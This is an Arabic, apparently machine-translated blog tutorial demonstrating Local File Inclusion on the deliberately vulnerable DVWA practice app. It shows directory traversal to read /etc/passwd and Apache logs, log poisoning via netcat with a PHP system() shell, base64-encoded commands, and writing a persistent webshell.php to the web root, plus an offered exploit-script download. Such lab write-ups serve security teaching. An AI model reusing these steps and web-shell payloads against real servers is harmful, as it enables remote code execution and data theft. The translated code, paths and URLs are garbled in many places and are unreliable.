لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI)
الكاتب:
أشفق الأنصاري

تم التعليق بواسطة:
تصنيف:
5
في مارس 18, 2013
آخر تعديل:مارس 18, 2013

ملخص:

إدراج ملف محلي (LFI) هو نوع من الضعف في معظم الأحيان وجدت في المواقع. انها تسمح للمهاجمين لتشمل ملف محلي, عادة من خلال برنامج نصي على ملقم ويب. يحدث الضعف نتيجة لاستخدام المدخلات وتوفيرها من قبل المستخدم دون التحقق من صحة السليم.

مقدمة

 

في الجزء الأول من لعنة الضعيفة تطبيق ويب (DVWA) سلسلة, رأينا كيف يمكننا تثبيت لعنة الضعيفة تطبيق ويب (DVWA) في بكترك 5 R1.
 

إذا كنت لم أقرأ الجزء الأول, هنا هو الرابط: HTTP://hacksys.vfreaks.com / القلم اختبار / لعنة الضعيفة-WEB-APP-SQL-injection.html

 

الآن, وسوف نقوم باختبار ناقلات هجوم آخر يعرف باسم إدراج ملف محلي (LFI).
 

إدراج ملف محلي (LFI) هو نوع من الضعف في معظم الأحيان وجدت في المواقع. انها تسمح للمهاجمين لتشمل ملف محلي, عادة من خلال برنامج نصي على ملقم ويب.
 

يحدث الضعف نتيجة لاستخدام المدخلات وتوفيرها من قبل المستخدم دون التحقق من صحة السليم. هذا يمكن أن يؤدي إلى شيء في حدها الأدنى قدر إخراج محتويات ملف, ولكن اعتمادا على شدة, لقائمة قليلة يمكن أن يؤدي إلى:
 


1. تنفيذ التعليمات البرمجية على ملقم ويب.
2. تنفيذ التعليمات البرمجية على العميل مثل جافا سكريبت التي يمكن أن تؤدي إلى هجمات أخرى مثل الكتابة عبر الموقع (XSS).
3. الحرمان من الخدمة (وزارة الخارجية).
4. سرقة البيانات ومعالجة البيانات.

 

الآن, الفكرة من وراء إدراج ملف محلي (LFI) ناقلات الهجوم هو أن, أنها تسمح للمهاجمين لتشمل الملفات المحلية على ملقم ويب باستخدام البرنامج النصي على شبكة الإنترنت عرضة إذا كان خادم الويب لديه إذن للوصول إليه.
 

لكم جميعا يجب أن يكون التفكير “ما هو على قدر كبير في ذلك?”.
 

جيد, يجب أن أقول أن هذه قضية خطيرة جدا إذا لم يتم تكوين ملقم ويب بشكل صحيح.
 

دعونا, نعتبر أن مهاجم قادر على تضمين ملف محلي على خادم الويب عبر الضعيفة النصي PHP. فهذا يعني أنه سوف تكون قادرة على تنفيذ أي رمز PHP الذي هو هناك في الملف الذي يتم تضمين.
 

الآن, بعض من يجب أن يكون التفكير “ما هي الفائدة من تنفيذ البرنامج النصي PHP من قبل بما في ذلك ملف محلي عندما لا يساعد القراصنة على الوصول?”.
 

أباتشي خادم HTTP توفر مجموعة متنوعة من آليات مختلفة لتسجيل كل ما يحدث على ملقم ويب, من الطلب الأولي, من خلال عملية رسم الخرائط URL, إلى حل نهائي للاتصال, بما في ذلك أي أخطاء قد تكون وقعت في عملية.
 

هنا مقتطف من تحذير الأمان وجدت على صفحة وثائق أباتشي خادم HTTP لل.
 

رابط: http://httpd.apache.org/docs/2.4/logs.html
 

تحذير أمان: يمكن لأي شخص الذي يمكن الكتابة إلى الدليل حيث اباتشي هتبد يتم كتابة ملف السجل كسب يكاد يكون من المؤكد الوصول إلى رمز المستخدم من بدء تشغيل الملقم ك, وهو عادة جذر. لا تعطي الناس حق الوصول للكتابة إلى الدليل يتم تخزين سجلات في دون أن يكون على بينة من العواقب. انظر الوثيقة نصائح الأمن للحصول على التفاصيل. وبالإضافة إلى ذلك, قد تحتوي على ملفات سجل المعلومات المقدمة مباشرة من قبل العميل, دون الهروب. لذلك, فمن الممكن لعملاء الخبيثة لإدراج حرف تحكم في ملفات السجل, لذلك يجب توخي الحذر في التعامل مع سجلات الخام.

 

لمعلوماتك, في بكترك 5 R1, ال سجل أباتشي خادم HTTP لل يقع الملف في:
 

/فار / سجل / apache2 / access.log

/var/log/apache2/error.log


 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) تسجيل مسار الملف
 

كنت قد قرأت بالفعل تحذير الأمان أعلاه حول الأذونات دليل السجل. إذا كان المهاجم هو ناجح في العثور على مسار ملف سجل باستخدام الدليل الهجوم الانتقالي, وقال انه يمكن أن يسمم هذه سجل عن طريق كتابة تعليمات برمجية ضارة في ملفات السجل, إذا كان “سجل” لم يتم تكوين أذونات الملف والدليل بشكل صحيح.
 

أننا سوف نشهد كيف يمكننا سم ال تسجيل ملفات في جزء لاحق من هذا المنصب.
 

المسلحة مع معلومات أساسية حول إدراج ملف محلي (LFI), دعونا المضي قدما وتجربة ذلك في جلسة عملية.
 

لاحظ: في بكترك 5 R1, ال “access.log” إذن الوصول ملف لل “آخرون” ومن المقرر أن “ممنوع”.

 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) تسجيل إذن ملف
 

الآن, دعونا نعطي “يمكن قراءة” وصول إلى إذن “آخرون”.
 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) قراءة تسجيل إذن ملف
 

ونحن على تحديد “يمكن قراءة” إذن أن لذلك نحن قادرون على إثبات إدراج ملف محلي (LFI) ناقلات هجوم باستخدام لعنة الضعيفة تطبيق ويب (DVWA).
 

الحصول على تعيين والذهاب.

 

دعونا الدخول لل لعنة الضعيفة تطبيق ويب (DVWA) وتعيين أمن مستوى إلى منخفض.
 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) الأمان إلى منخفض
 

انقر على إدراج ملف.
 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) ملف إدراج تبويب
 

HTTP://192.168.96.128/dvwa / أمنية / في /?الصفحة = include.php

 

لتضمين ملف تحرير ?الصفحة = index.php في عنوان URL لتحديد الملف الذي يتم تضمين.
 

دعونا تأكيد ما إذا كان عنوان URL أعلاه هو عرضة حقا لل إدراج ملف محلي.
 

وسوف نبذل اجتياز الدليل ومحاولة لتشمل /الخ / باسود ملف. إذا كان هذا هو إدراج ناجحة, سنجد مضمون /الخ / باسود عرض على صفحة ويب.
 

HTTP://192.168.96.128/dvwa / أمنية / في /?الصفحة = .. / .. / .. / .. / .. / الخ / باسود

 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) /etc/passwd Inclusion
 

التي تبدو جيدة! كنا قادرين على تضمين /الخ / باسود ملف في لعنة الضعيفة تطبيق ويب (DVWA) بنجاح كصفحة ويب وعرض المحتوى الكامل لل /الخ / باسود ملف.
 

مهمتنا التالية هي محاولة لتشمل ملف السجل اباتشي. ثانية, سوف نستخدم اجتياز الدليل ومحاولة لتشمل /فار / سجل / apache2 / access.log ملف.
 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) Access Log Inclusion
 

HTTP://192.168.96.128/dvwa / أمنية / في /?الصفحة = .. / .. / .. / .. / تسجيل / apache2 / access.log

 

نجاح باهر! هذا يوم جيد بالنسبة لنا. أشياء يعملون في وسيلة جيدة. اباتشي خادم ويب access.log يتم تضمين الملف بنجاح. انها اشارة الكبير الذي الآن, يمكننا أن يتجه نحو ومحاولة سم ال سجل خطأ اباتشي.
 

لاحظ: كما لقد تم استخدام هذا بكترك 5 R1 منذ عام. وسوف مسح خارج access.log و error.log أن لذلك أنا قادرة على أن تظهر لك جزء تسمم من ملفات السجل بسهولة.    

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) سجلات واضحة

نحن مستعدون لل سم ال access.log ملف. هذا هو خطوة هامة وهذا سيساعد على المهاجم لتشمل access.log الإقرارات وتنفيذ تسمم رمز PHP التي من شأنها أن تكون مكتوبة إلى access.log ملف في هذه الخطوة. ويمكن التأكد من التسمم عن طريق فحص محتويات error.log ملف.
 

فتح محطة والاتصال خادم الويب اباتشي على المنفذ 80 باستخدام netcat.
 

1
2
3
@ الجذر BT:~ # NC 192.168.96.128 80

الحصول على /hazStart<?نظام PHP(base64_decode($_GET[ل]));?>HTTP hazEnd/1.1

 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) سجلات السم
 

الآن, يتيح تأكيد ما إذا كان التسمم ناجحة. لهذا, وسوف نفتح على حد سواء access.log و error.log ملف ومحاولة فهم مقالات انها.
 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) سجلات السم
 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) سجلات السم
 

بارد! لدينا ملفات السجل مسموما. كل شيء عملت كما هو متوقع.
 

لاحظ: لقد كتبنا بالفعل PHP قذيفة صغيرة في access.log تسجيل الملف. الآن لدينا الدافع المقبل هو أن يكتب قذيفة أخرى PHP صغيرة في جذر خادم الويب استضافة اللعنة الضعيفة تطبيق ويب (DVWA).

 

هنا هو الأمر الذي سوف يكتب PHP قذيفة صغيرة على ملقم ويب.
 

1
صدى "<?نظام PHP(base64_decode($_GET['ع'])); ?>" > ../../webshell.php

 

إذا كنت تتذكر مصغرة PHP قذيفة النصي أننا حقن في access.log ملف, يتم إعطاء التعليمات البرمجية النصية قذيفة أدناه:
 

1
<?PHP نظام(base64_decode($_GET['A'])); ?>

 

يمكنك تخمين الخطوة التالية التي يتعين علينا القيام به بعد النظر في التعليمات البرمجية النصية قذيفة?
 

جيد, الآن سوف نقوم ترميز الأمر لكتابة البسيطة PHP قذيفة النصي إلى جذر ملقم ويب باستخدام base64 في ترميز خوارزمية.
 

هنا هو برنامج بسيط لبيثون base64 في ترميز سلسلة:
 

1
2
3
4
5
#!/البيرة / بن / بيثون

base64encodedstr = """echo "<?نظام PHP(base64_decode($_GET['ع'])); ?>" > ../../webshell.php"""

طباعة "سلسلة المشفرة: " + base64encodedstr.ترميز("base64 في","صارمة") + ""

 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) Base64 Encode
 

ال base64 في سلسلة المشفرة يرد أدناه:
 

1
ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=

 

هذه ستكون الخطوة الأخيرة قبل أن يتم الترحيب مع قذيفة. 🙂
 

ونحن سوف انتقل إلى URL فيما يلي لكتابة مصغرة PHP شيل إلى ويب الجذر الخادم.

HTTP://192.168.96.128/dvwa / أمنية / في /?الصفحة = .. / .. / .. / .. / تسجيل / apache2 / access.log?و= ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA / PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA =

 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) PHP Web Shell
 

أخيرا!! لقد فعلت ذلك بنجاح. لقد حملنا على مصغرة PHP قذيفة باستخدام المحلية وجود ثغرة أمنية إدراج الملف في لعنة الضعيفة تطبيق ويب (DVWA).
 

أنا أحب الأتمتة وهذا هو السبب في أنني أحب بيثون. بيثون يعطيك قوة ممتازة لإنجاز الأمور المعقدة ببساطة جدا.
 

لقد كتبت السيناريو بيثون أن كتبنا لأتمتة استغلال إدراج ملف محلي (LFI) في لعنة الضعيفة تطبيق ويب (DVWA).
 

لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI) استغلال سكربت
 

كما طول النصي استغلال كبير جدا, لقد مضغوط جميع النصوص المستخدمة في هذا المنصب، ويتوفر للتحميل.
 

تحميل لعنة الضعيفة تطبيق ويب – إدراج ملف محلي (LFI) إضافة المواد:
 

DVWA - مخطوطات استغلال LFI
3.9 مصرف كوردستان الدولي
644 التنزيلات
التفاصيل ...

 

شكرا لأخذ وقتك لقراءة هذا المقال. آمل أن يكون هذا يساعدك. لا تتردد في ترك الظهر تعليقات إذا كان لديك أي شكوك أو إذا كنت ترغب في مناقشة أي شيء بخصوص إدراج ملف محلي (LFI).
 

46,416 مجموع المشاهدات, 27 مشاهدات اليوم

اللسانين التالية تغيير المحتوى أدناه.

أشفق الأنصاري

باحث الأمن
أشفق الأنصاري هو مؤسس HackSys الفريق اطلق عليها اسم "النمر". فهو باحث الأمن ذوي الخبرة في مختلف جوانب أمن المعلومات. قام بتأليف انه "HackSys المتطرفة سائق الضعفاء" و "Shellcode من الموت". وقد كتب أيضا ونشرت صفحات بيضاء مختلفة على استغلال البرمجيات على مستوى منخفض. اهتمامه الأساسية تكمن في "انخفاض مستوى الاستغلال", "الهندسة العكسية", "تحليل البرنامج" و "الهجين التضبيب". وهو بوي الذكاء الاصطناعي وآلة التعلم. وهو يؤدي الفصل ل اغية بيون.

أحدث المشاركات التي كتبها أشفق الأنصاري (انظر جميع)

2 ردود على “لعنة الضعيفة تطبيق ويب - إدراج ملف محلي (LFI)”

  1. سيكون من الممكن أن تظهر الهجوم دون إذن القراءة على access.log. وبعبارة أخرى تاركا مجموعة إذن ممنوع? وبما أن معظم خوادم قد يكون هذه المجموعة في المقام الأول. سيكون موضع تقدير كبير.

    • مرحبا KC,

      للأسف, يحتاج ملف السجل ل إذن القراءة في access.log.

      إلا, ونحن قادرون على قراءة الملف, ونحن لن تكون قادرة على تنفيذ الهجوم.

      لكن, يمكنك محاولة الهجوم ناقلات مختلفة.

      شكرا.

ترك الرد

لن يتم نشر عنوان بريدك الإلكتروني. يتم وضع علامة الحقول المطلوبة *